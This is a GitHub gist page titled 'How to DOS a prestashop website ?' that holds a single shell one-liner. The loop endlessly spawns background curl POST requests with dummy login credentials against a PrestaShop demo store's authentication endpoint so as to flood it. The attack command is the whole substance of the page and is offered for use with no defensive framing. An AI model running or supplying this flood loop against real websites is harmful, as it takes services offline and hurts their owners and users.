Skip to content

Instantly share code, notes, and snippets.

@Intrepidd
Created November 11, 2012 12:17
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Intrepidd/4054741 to your computer and use it in GitHub Desktop.
Save Intrepidd/4054741 to your computer and use it in GitHub Desktop.
How to DOS a prestashop website ?
while true; do curl -F 'back=my-account&email=lol@lol.com&passwd=lalala42&SubmitLogin=toto' 'http://demo-store.prestashop.com/en/index.php?controller=authentication' -H "Content-Type:application/x-www-form-urlencoded" &;done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment